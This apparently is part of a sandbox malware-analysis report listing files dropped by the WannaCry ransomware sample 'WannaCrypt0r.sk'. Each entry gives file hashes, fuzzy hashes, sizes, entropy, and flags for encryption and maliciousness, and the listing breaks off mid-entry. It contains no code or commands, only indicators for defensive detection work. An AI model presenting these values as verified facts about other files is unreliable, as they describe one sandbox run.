                                                  SHA-512:67C730156D4F2EE235CACC77BBA8C97FF80BA8D9E38159CF40527CDE41874349A650C8D8216287EACA202D8162C27F83997A281AA757164285542F808D635920
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6760
                                                  Entropy (8bit):7.97066902697336
                                                  Encrypted:false
                                                  SSDEEP:192:TdbKtbkUiXZY01nhkABrBMb3KBRb48fRGxK6XR:TdbKtbkjDnh39g0bH6B
                                                  MD5:8A9F7FE136D56659DF8114F2820F3422
                                                  SHA1:17B58873D5F04D2D1F05F22CA111C51BCD03ECF3
                                                  SHA-256:0462F2F6777AFEFA969600C3B7592E0C3C3CCA04156FFD956044005E47C4885F
                                                  SHA-512:E42EE216872D37E0EF99CC878B8897D57C702639BB3D42F5550006E43ED571246F725C9CA9B5E35AF9CF524037748F4FBE9DE70F8EF019587A487FC64E20816C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):23448
                                                  Entropy (8bit):7.992175363889883
                                                  Encrypted:true
                                                  SSDEEP:384:5e9rKgZY0moFPrAHdhTbSFpBHyn6GrWpPxjyo5X6wuaZk6Tmca1Pv6Qm/:g9r5YmFChTwpyn6G8j/5XtjTm/v6B/
                                                  MD5:B23C152814987429B682D3DB4C0051E9
                                                  SHA1:A3B7151063F0701523D6AAF409287DA91E66D3CB
                                                  SHA-256:AA3315AA0A5C97DB39A595C0F6C1A6E1E21C960BE02BB9FD9703CF211ABDBFD2
                                                  SHA-512:64BFE71B6D83D8E8051F76BFC50882F072DBDB2541CAFC5B8F2292B6DA0E4F404D9B2F3D4D89985AB652A0EE12D368E23D4E7D6CE3E0DA5FC2948BCB3ABD8C37
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5240
                                                  Entropy (8bit):7.961258053494169
                                                  Encrypted:false
                                                  SSDEEP:96:oBobyakMyimPtQzXLN24K3+Et2hq1YZRAZ64rXw+mRBJMT4X38zNlw50HECXmzRO:Ota3/mPazXLw4Kuah6+mR7M0v8m1O
                                                  MD5:18AD25F0371920F02DCBA08876C08120
                                                  SHA1:E84645A2FEE33EDB7CFFBECA6998DAB9FCB106D9
                                                  SHA-256:14597B299943BEE110D213DDFDC16941F9142765B28B3D22A0A2475882419774
                                                  SHA-512:822090E5C18C9225E03BFC76BB61CDD84F1E3AC813EF9A6ABEEEB99171E635090122FB0399FCC2316DC339EC580FACF77AC1ED2779DA5F33C20D384647A1455C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):9736
                                                  Entropy (8bit):7.975696490298713
                                                  Encrypted:false
                                                  SSDEEP:192:z+BNTrOq6Igzy0EJJqSxCOj9mdlz+g3joJEGJOj/mpLspiKQtlgfMg:CHTqEJdCOj9mtSW/mZs0KEqF
                                                  MD5:9590BEA7AFB5D6F2F84EB52C8CF59172
                                                  SHA1:AB20957A1FEE44E3F88336A6288D0FEAFDF78A79
                                                  SHA-256:B51FA46879721C7238DFCBDD2522780367C330875C8FB1CF00151D1C792D115C
                                                  SHA-512:866DF352D46F9FAD398A6883F3C8BE18375ECE3BEC8FB29E9E93F782D36928211D690F55FFFEA67D20786A10AD4B2579BD3CBE2064CBC142949E8F0427AC32FE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4552
                                                  Entropy (8bit):7.954529835159166
                                                  Encrypted:false
                                                  SSDEEP:96:o2zb3zgrBG8Pcw5ZPOymIpoFo68l9y02j1cnYIgAtp/4mfP8J:3DgwEzPOT268f258DgAtp/40PU
                                                  MD5:FE562D00DBDCC07521317B634727524C
                                                  SHA1:EC558031F991A30F4E8BF407DB46A2CD10DCE2C6
                                                  SHA-256:3F88E34C2B4F6749EA6A3E6D6F9D0D91651D04E2A9445194EFBD19A9870C9591
                                                  SHA-512:A590E688C4E9A77F63458617759393D18007955747EEDE2C3294A4B62C5658102B6EC866B854FD3C69E9346453068E1BFAC989130ACBD02FB0EEB2B8CAADD7C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2097432
                                                  Entropy (8bit):7.9999181451132015
                                                  Encrypted:true
                                                  SSDEEP:49152:MbckDVoSkdIqedgIm0rUVmXwVIe0qY44Ot17cS:wNuSOIxpmCcOw2VX4NRB
                                                  MD5:DD5172B71FF64E363C8101CC0FC6ADC7
                                                  SHA1:93DC404E283CA082C44409CB748340A3FE2C10A0
                                                  SHA-256:27DC1C9C295500131F58DE9C6F3F6F7E61A563D718F8E5E3AEE741F1CBD50BAA
                                                  SHA-512:79F56D07E190B3132E4AD452770C8174FC845B6975833D48F349F2BFA7BB6C372CE69B367F0FECC98C7DE77ACA3BE947D4E26C475C8F4F2D698FB2E30C58A5F1
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2680
                                                  Entropy (8bit):7.91258527416419
                                                  Encrypted:false
                                                  SSDEEP:48:bkkfpbgqS7iWv8xqNJQJAnk3Mo3thj4ed5zy4SYPA:oipbgt2WUxqNyJAno3tieLzy4a
                                                  MD5:8065FE9AB6D418E716D4687045BD2424
                                                  SHA1:6C1290B2FF2A1AFB3866949F3BCEF4A115F39185
                                                  SHA-256:BA3F35654D7A262B7859F86A604C4BCA2AB1CD642A26020EE0DA46B89633249B
                                                  SHA-512:BC48E256653B17670EF9E1DB0D3917467BF83608F2B0D4BE6AC3B11945C27FA497DD4A07755F109790C568669B7FEB545EE26749CCE4AEBB58E7026D1ACA2B23
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1912
                                                  Entropy (8bit):7.895761039515826
                                                  Encrypted:false
                                                  SSDEEP:48:bkXllJ49In+oUTHIF6F0OuEmJzwZPEPgZyViqIJ03Mzj:o1lerL0OqJEZP8Qq603u
                                                  MD5:DC9281929B72E9BFAAFBC37994C105BA
                                                  SHA1:F0FFB64E0303EA762E5660653CFABB006567DF9B
                                                  SHA-256:7E5024C1380B5E1EBDD83A5DD452607B75D5CA9C46368B3A05818FA98E06E1D7
                                                  SHA-512:9FC3A08AD26D94054806EE26A7CB81345C74D2CF7C7D325470400A6F457A16760B1F2B86F3B7B7D52C3A0EBDC11D5513DEC670D9771B2D59747EAEF64753FB15
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2696
                                                  Entropy (8bit):7.927990333946639
                                                  Encrypted:false
                                                  SSDEEP:48:bkfRNVOu8gwEYF6NS5UHCDfuVx7Of1VWRK5dGWIURoG++xVu7RuJBaNmM:oJPpwj+kSYuVJOf1PdFRoFaYoymM
                                                  MD5:F794F73434ED79DA6143CB6E87B0B939
                                                  SHA1:61B49A75C7291C2C349574EA4FC0AF2DFF030570
                                                  SHA-256:62B04B94ADE8FE0DE092971F00A56CAC68A9201283A597C26DA277AA701C70AA
                                                  SHA-512:F945C4393A035B5D215ABA3D0488ED5EA35011EBB7250AC9DB3036138AFD762A8397CC711711B319F2166F0560964C107AAB9ADD748E51BD6B3159BC3FBC7705
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1864
                                                  Entropy (8bit):7.915134004993225
                                                  Encrypted:false
                                                  SSDEEP:24:bkxzDIpohs2RsZL1Nnx57heiMFx5Qwlzxy6zmv1UAat0OsYRKwE66pVud6ZL:bkxzUpCs24/Qrxgv1+SlYYbbL
                                                  MD5:DAB163933701304A32CDDEE5B3EEFDA4
                                                  SHA1:5571C79DCAA983E93654DFE7EFA9B4D826236572
                                                  SHA-256:5B8C51A57DDA50B462775B288EB934B746A38CCF7AD2F98484278C871A984F45
                                                  SHA-512:37CE925D31DF77885161BAAD41CE5EF269AC49879D9644BD84707B931EC4AF46F248ED11B8E5F80D7CBEE557FE7443E0ABF510068A338432C9642DB792DA6849
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1848
                                                  Entropy (8bit):7.899603037803772
                                                  Encrypted:false
                                                  SSDEEP:48:bkh8pITzQccjBW7xrSDC1RbF1Ax7eNsXzsg6HM:oDTzKo7xrGC1giNYOM
                                                  MD5:F677B7129878B14B1DE1E3A5A88901AA
                                                  SHA1:E8502BDED0FA2A962F48858DE7D476861C6311E4
                                                  SHA-256:E47D25830FB377F73DA947030E384C027066EE2A6F986A1394DF2A7609D880CB
                                                  SHA-512:38C9C8500FC924AC55DCADBF912D750A2D8E95CE25D76B2631D779A1D2076FD7734BB93226B57BAF1260B1D5280694B6E21F8158DB2D4E2D00B4070005CA2AD1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1400
                                                  Entropy (8bit):7.850543164774669
                                                  Encrypted:false
                                                  SSDEEP:24:bki6cwI0hFwG75Kx6g1f0cv4YMVwu/SjhtDVHdQ2/LmdWPfceIqJOL3kycm6oEZJ:bk3wGlKxHJv4Bv/khJGdWPNQDkFfPR
                                                  MD5:83DAEDEF446642F77ED2B6591D9E1C59
                                                  SHA1:AD8EE59F986CD4365C2BDA934CA56D553A17D248
                                                  SHA-256:89E20BC3B896172B0E09E41B9648175A69F369D83243F0855C3076788FE8B9C6
                                                  SHA-512:846EFDDD41B92FF597A0199E5834F93C1B3AB63AB1D6739831F6EB1507C1F2A5D49501F76C96C50476520B3A820020E7486F6114E47CE4359B7C7292F1111D5A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1736
                                                  Entropy (8bit):7.887340737898679
                                                  Encrypted:false
                                                  SSDEEP:48:bk4KIux+M7T9jqCavswRo1llC1TmNHjXMxFQhBPZhuQ5C:o4KDljqCDwRo1yRVxChBPZe
                                                  MD5:3209E08B821A1543E2CE97C88EF5FAB0
                                                  SHA1:99AE16E77BBEF52443946963B91709FA13A6AFAC
                                                  SHA-256:A16E0DFB1CB3DC127809F892E7F80552E82506EC000D6AF72B39F2EB1FA3287C
                                                  SHA-512:AB2B9AFB310335B848068FE87BD821BFB5E28A0C64DD81406D81F87BB059FEB8D922C7AAA55E10022A2E5C3A7F9D38AEAEA9D250638AF73633DBEACEEBC47F71
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1352
                                                  Entropy (8bit):7.833507954685613
                                                  Encrypted:false
                                                  SSDEEP:24:bk5H8TnCk1B2hWngxCjggN6pT5vPtxd8EJ8lPCt3lQtG0PXEGJP7ihLi:bk5H6jB+Gj5N6ptvPtxd8/at3lQ3PPJv
                                                  MD5:3CE0A0F3030C2C4C720711AFEBB4614B
                                                  SHA1:7E4C8A080637B0B9E73B437DABB5983DAF58BC80
                                                  SHA-256:78D04E977E4F18CED98F7335B2601C2E9C986B7A6CBA4ED322DA781CC444B5FF
                                                  SHA-512:CCCCEC66E011E13F01E1E1E766EDC1799585C09CBCBA792CFA2B2E7FD47D25D9C3BD9A981E719BC13536BF28A55BE615278101E1DB5AD5D8E0327B8916D1AE46
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.730407812379379
                                                  Encrypted:false
                                                  SSDEEP:24:bkrYK4K9gCawGBYQQTEe9r+XvcPajWMdmjJUNQYpxa:bkrYK4K99/pQWJ9jEmjJYpQ
                                                  MD5:1120392E6DFF1AE2C677247B93AB0F3E
                                                  SHA1:467A5844EB81E10D63E6C8E13F2B3F8B7BB155B8
                                                  SHA-256:B6EC13E1421AB88B1BA1FFC4B78C76CB8D048603289A24CEE58401F3C7528B4A
                                                  SHA-512:7E60B51E3009483933CB319DF7882C1F831BB480323C91C00A8252ED885019D3D48ED328849C4285A6E74017B54E48DAD8ED7EC2F95AF695D6DA462A5FBCE269
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.746905145533332
                                                  Encrypted:false
                                                  SSDEEP:12:bkE5k+3GoojT1xCTiOa9xxb3Hu8sGSv1TthABi2tYsaZ0205RLX5cyFlAZh:bk3+CjBxCTu9rXu8Dw1H/2tYQ22VFoh
                                                  MD5:0249B0631928219E45B6A0E99737B143
                                                  SHA1:7B43A38A298E472D03406315C63EB3BFC1AA73DD
                                                  SHA-256:876C0075EF03B640FE8A1211DB93DC7CF58E853A7BD969D46DF80815BFD99BFC
                                                  SHA-512:256F0B57700CE94985D6D5DE3098ED146855BFB83340C2255F8FB283A5B487F19F51C11F6515BB488F60B5D31E920A9F0AEB387E08B9343EE3B98DA7F7A40447
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.745739716219013
                                                  Encrypted:false
                                                  SSDEEP:24:bktZZmDPgmooV1s7U6y5UnCwnwA5+/PI2S6RTUO+g82e2:bktZZWP/V1EU7unH15+4p4T5+wt
                                                  MD5:ADA86F788D6DBA7A5F04BEE8FB7DC9E8
                                                  SHA1:D7D285699FFD446F6D157721D40148D111BFF2B6
                                                  SHA-256:C06165813D41B2A9BBBDA1AFF37A9711BD3101380ED55936C55D91F8E38B8814
                                                  SHA-512:453FBB3C151311B44346292D87C2814FEA12764A1592BCFB9239FFFF9C02E73FF620BD337EC3B634078D51AB45A6667605DDC41F8974A5D08CA9B8B027B7AEAB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.861831447405634
                                                  Encrypted:false
                                                  SSDEEP:48:bkbEJdGBWcqVyPaQLIHygEGumf65VNWXXs:obEJdGkceK7hGQ53yc
                                                  MD5:A9F08CAF1D9DD16BD123B6A923E5610E
                                                  SHA1:02FD3CFAAC9A5E8BF81C5B69A4F1AE2EA12ED45C
                                                  SHA-256:F4244DF13DCF48C00E0A02D4A4E203FA47AE14EB12D37E0867B781C19B011767
                                                  SHA-512:3274FE1CD59BA1FFC5B3A9E668C3CBD567993BD37976A1002602525BB8F91CFE1885AC162896A31B5AC8A5EF4FA97CB336D6FF5B4BFA94606737234651B9C6C1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.856055905198148
                                                  Encrypted:false
                                                  SSDEEP:48:bkWU1AeexavrhuEEfCyWJdCnPo0JQQQc9pHeES:oWjeAYk9aTKQQQcjHE
                                                  MD5:857513D809629174C2581883E6FB6450
                                                  SHA1:2A94491A1EC2EC095D83B8436D6E39E1989156B3
                                                  SHA-256:D4333E8B1BF7270C4E91B0DFBE7315CF51CBD19EE065DECA49FBD171FEAF3781
                                                  SHA-512:A42A4D6E8AA0BEFA7F351C9EF8BC9F10CE6F7168963F0B2F4EADB51DCE7C6B0586BC171D066FFC7544AF18D007F8D8DEE2C01CAE330EC7AB400232452824D607
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.87972038682944
                                                  Encrypted:false
                                                  SSDEEP:48:bkpbJHhubwta5vnuNl7fHkqsnBAoYwurPZw:onKwta5/uNlLPsJdIO
                                                  MD5:96229D4DAEBE7CD8529A70ED1EEA64D1
                                                  SHA1:75CCB24BA69CDCFF68CEEBA5F596CC5DE217E35C
                                                  SHA-256:11102664BB6CDDD4BFE0FC64526E31B0DB4EACABC1044D9FE5E1467C6FE75F52
                                                  SHA-512:A94F70B9AA880070007812FB9E95C1D8124A095F40F62E099596ED4F81837A5463779AD3386B3295407D5E5148B5B00465485FE17C18CB9E2947D6553643B378
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.683195187952213
                                                  Encrypted:false
                                                  SSDEEP:24:bklASoQ374deZalPpJZhfVJ3ic4MWKs9tN/:bk+XFr9pJlJ3iF5KsbN/
                                                  MD5:D9178231A8070A35214EE8D25B0B1CF0
                                                  SHA1:9D0ED2B22C5F9F5D161C01281DF2CCEC94DD7CF9
                                                  SHA-256:8DADE24DD75B409BB1A29BD938C998C524988FAB8233CF09339140B86AF02E35
                                                  SHA-512:CAEA46A736073AE8AEED76DC4148203113F1241E5776183345A638428A334F640FE8C9852BB215C8A32C9E22476903D2F0FE02BE0CDA9331023E1CA0FBF45AA7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.763954126042651
                                                  Encrypted:false
                                                  SSDEEP:24:bkvTyXlnq9cbaq2h7SyrJ5LX7tR2SLbWLQ:bkvTyFq+OZh77lpLtR2IbJ
                                                  MD5:FDC90EF9CC12CC42A3BAB995455B4702
                                                  SHA1:8F92CFDD61C278D15AA18411BDA0E6FE69667718
                                                  SHA-256:65F47424A8133285F02E76442688E5CE081EA58CCD80D198828FE4A670776B08
                                                  SHA-512:7B018AC8002F3A29E5F7992605026FAC1478A8731FCC6CA523CC2B0DD90DBCCFA1A1CF974C611F1496EE62F0158BD203BFBAB35E66E4B0B93919F8A6F5A2C484
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.789016006039531
                                                  Encrypted:false
                                                  SSDEEP:24:bkIu5+a51a4/USpQIdIJyr+riKI39d9VBy3C:bkIuEaPa4/USfFr+riKI39gC
                                                  MD5:4A779740D2CCC29AA383785C0960BD23
                                                  SHA1:7C537CBE670D8384A962F07B7B6052EC879DD72C
                                                  SHA-256:423F37FE659A2BFF3093E4E5FF40315EAFA8BD96FDF3AB2AFF52032DFD87B280
                                                  SHA-512:847C592C8E09AC32D3E585B5514E35EB0AF5EE0D1ACF4100F5DF0FFED2E0599951EE39295C6ED6E7948545F7BBED6B3775A276D0349088B31A01DC9329E345C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.7351772695625725
                                                  Encrypted:false
                                                  SSDEEP:24:bkVmOX3nG2mswLUdZ1seo5bGlqUDfcFIJcU9wI3vlE:bkNX3G2sLKFo+fL7pve
                                                  MD5:78DC9916A3F98ACE82B90EF9CC64CF09
                                                  SHA1:D3B7F196F21B5A976EBE73498DA87E0AD58EAEEB
                                                  SHA-256:F3A84F63C6B3ED32C4ADCF4CF9C1D216F13C95E20EE9A87DE206526C5CA2CFBC
                                                  SHA-512:181B1BE46920A2F8C21CC703AED688CC994FCA5ABFBF404636D773F3218F8E7EE2C9ECB1776ECAC6493FE0F2D9B4C1C8B5EBE86B970B37FB5D0153FE31B06CF1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.759052197574247
                                                  Encrypted:false
                                                  SSDEEP:12:bkE9ds5IEjD4iwTv6ot3+94Kfv7wRFay8jf7zKUDHuxB+Hc2Y2q3AheUO3HRW3Tu:bkYs4hv6w64QERohjf3HK2q3AQ03TLK
                                                  MD5:993EE72CC5B3A30FFA1DE78752CAA93A
                                                  SHA1:95CA0B2628EF8184244F39E2F7314EBB209553D2
                                                  SHA-256:8A7D14A565EEE0D24908D5C6FD1364EDFDC111349B66CA5DDAB3F15EACAFDF9E
                                                  SHA-512:4236E8FF2E0A3D979298CA487FF6EDAFE28238ED8AD830519FA3F06750A501F73CA318A83403269FD1F58563147B0D6ED6FAAF6A88172D57CEAD3F71CD69D180
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1880
                                                  Entropy (8bit):7.886700788705434
                                                  Encrypted:false
                                                  SSDEEP:48:bkFc249t6/RSf1rvULFimyQ5Tk5NcjANnD:oFc2/S5cLLOmjQ
                                                  MD5:E7849A91BD3084C39A8F48D0085FB57A
                                                  SHA1:DA86FC6A1AF1C3251285503A7ADAFD449F596529
                                                  SHA-256:59ED471E43B81DAF37EB37BC09A8CB549E47830594C8DBBA5EB4754162C6D905
                                                  SHA-512:617A546DC1CC69AB9C0AEC381FE492BE64B4F34422793871CBE94A5774B5D683D598EEFE5E8052C50EE63AC1A62FC4044BE70455248741F6C0B97D1DFDA75BF2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1944
                                                  Entropy (8bit):7.891575439369692
                                                  Encrypted:false
                                                  SSDEEP:48:bkXJZMwaoDEiwdIsc78W7QZBJG5fsL+TU214KCY6k0Df/iF:o5ZMhoDzwdIMW0Z+5fe+TUVY6PDf/iF
                                                  MD5:0F46681101C54D75F113A62A1CAB298C
                                                  SHA1:564E37A5D39E12B3B42EC414E4543B7DDC5C2B3A
                                                  SHA-256:AB4568B7AD70D7AD3EFD09BA72F306E767AAA3085C5F5F32FB8696123BDE1BA6
                                                  SHA-512:6D0431F68D31AFDB015C11F3181CFDB779DE9BE93B48B457CA62EA8FD5C574EBF3F08ED359317F1DD35D07250F327FF825CEA5367F3CA259432CDCB0E6115AFA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.872312578087441
                                                  Encrypted:false
                                                  SSDEEP:48:bk8+v1+DId81fv8MvylWxl4TZLfUg2Br0:o8+N+DI2v62l4ZLfLSA
                                                  MD5:6B4D8042C164571BBFF370D3230F3357
                                                  SHA1:0822464120215F94376C52E4EEFC9E8F7493F587
                                                  SHA-256:B8FF8B18CFE041002A058CCE5BC09DBCDE097F33FCE2BCFEAC221AE173AC8C14
                                                  SHA-512:28C7F05C1AB77D9F6C76D782A3FD28C2D4D425BD103D8807999BC70FAA2BD668B65401E6B8A1BFF5E8451FB1473FA32092E73734C0C6203BAA2BF6E1DD25F70B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):202120
                                                  Entropy (8bit):7.99910724453835
                                                  Encrypted:true
                                                  SSDEEP:6144:K98tySpDP4vqu8myL/ojO37hWfx0+j2F0N:IS/ojOFgWC2FO
                                                  MD5:2E3BA76735C3199373CFDA4742F986F6
                                                  SHA1:DAAB04FDC298EA37B2820BD41A4DC17C69FE2025
                                                  SHA-256:E600839EAFD95446C673A9AF8202B141E4014C866B56076C91E11FE8EFFD0E58
                                                  SHA-512:96486958F79270244356046717954F97A195DD492601BEBB5C74168CD445C35D551FAA3AD078D434E57B5381455724AC8FBAD07A39794FC271951BEB28FE74D6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):34536
                                                  Entropy (8bit):7.995221646879254
                                                  Encrypted:true
                                                  SSDEEP:384:L3okjUd03YY5z8jpn3Jitmhm4XPiokrzmgS2PfK/vks9b6icHYxIrPiRqiLZFBhD:LY6Jw3hNUdfBkbRxxKHiVlWs1i6rDj
                                                  MD5:C67F715F9D1BC5B175D3487235A3DD0B
                                                  SHA1:964E301602855A719226FE2C79AED421295CF216
                                                  SHA-256:E013243A00C21FA29AF9FE4DA33071676B16CB3539B5BE6D693B61DF61E5095D
                                                  SHA-512:739A315BCFA1F29951395B36CC4B841EF01771C31EC89F32045070F2656BC934C9E4D3E912D43083A49BF224A59B319697AC2602B937629679B580549A6430DD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):227064
                                                  Entropy (8bit):7.999235571649068
                                                  Encrypted:true
                                                  SSDEEP:6144:8rb7KuFCGLz6rzurFgNTzswz4r5Bkz+mW:8eYz6rziByqmW
                                                  MD5:21C0018D17512CCDA55C61923999D566
                                                  SHA1:A8FADECD851441B56BB047EED4FC5487BBAA3734
                                                  SHA-256:9F431941955583AFF21E88B014839C66C0D998C3C6BA5870304A9B0128807E3D
                                                  SHA-512:BCACDD402EA51BF963482229CAA54B1FB6B89E8E4D40A2B891BC22366BC5AB1B5B2ED9B73602624E33FE4FCEE622AEA0445288CD16F587F93E29D135A51E6CFF
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):53752
                                                  Entropy (8bit):7.996588520050917
                                                  Encrypted:true
                                                  SSDEEP:768:FBsO/NUEuIaalBjeTrhe2HU259EFY/wRe/imTSAGkNrN3YhxZ9jlWpd9pHEFdyXQ://p7lBCTK4StH0SAGYrNIp9spd9pkFPL
                                                  MD5:FCEF6D4029230BCAA72305DCAB62192D
                                                  SHA1:743319AB25CD8048B4A969F464889CC6FB28DFFB
                                                  SHA-256:E6F9C82243DD147B97B4CCFD99C02FAA7C483478222B0245EDC0F28783A3750D
                                                  SHA-512:86A353144F484ADE0FBA6C7A7071EC58B16B0189AEF6E72EF75B2B8D0A1229240BF20EAB934751A5D8AB3C0DBC3688DED17B0F34797E719046866475A5F74F0C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8008
                                                  Entropy (8bit):7.979806667248807
                                                  Encrypted:false
                                                  SSDEEP:192:HLy65yYh1+8m+igp+W+r06OkylI7UU+HqjoV/iQl9qZwTFTgyU:H98wmrYTc9mfq2TgyU
                                                  MD5:9A4A3BB493750D9D0C62825929BF5190
                                                  SHA1:BF9F8C84C8F0991D143DB756C979A155554B05B5
                                                  SHA-256:1B7BAD8DBF19EB3B44D6915DFF1A7CC07531A96AB75A1C9CCDA6104B5E11CEE3
                                                  SHA-512:694B893BC5B49F89C7F114A1AF02D3D68908570D42DAE9B4CC83996AE860E1A60C5FB9215F99D8AEFCA6212213ED962200007C6F0EBDEAB75C2F8C36299A7152
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):123256
                                                  Entropy (8bit):7.998652798814184
                                                  Encrypted:true
                                                  SSDEEP:3072:E/bK7la2qY2b7jz02i/TaGN36XWKLkj3fWAOA6HvuMh39tk:ETK7c224bsXWhzO9AovFttk
                                                  MD5:9B3003B94AA23EA2A7B940DFC0358BE6
                                                  SHA1:FFEADC1E5E9413566BCBB851970C8004E934E14C
                                                  SHA-256:B1AEA0A9FB655C86EA1F48222D5B9822A8441BFE3595F34F86F4C3D60B4A2040
                                                  SHA-512:E7DC4398C4C15065CCB2790EC245B7E867B2AC0A276370A851B1D9F20C73F8DF06CCAB0626AE8F4282D6EFEA7360F616E6E2E7D0A77C0ABB6A4D51EA3BD5220C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):95112
                                                  Entropy (8bit):7.998129436564507
                                                  Encrypted:true
                                                  SSDEEP:1536:e/nz2LmkExqw5mM9NkROjVE/Ymu97SV+TfsUlia7D5Banqa94xAkyTd+6Fak9Tbl:RgmSNbq/Ymu97SV+bsUTdk55Td+Gp9fl
                                                  MD5:BC3649C955BCD5E7508965F9ED6D6403
                                                  SHA1:78AAA6363690D35DFDFA33CC14500DE03BCF3BE5
                                                  SHA-256:386DB7ACC4489020A8C74ADD0418FECCE722909F99FA2C88ADE26B70723043A7
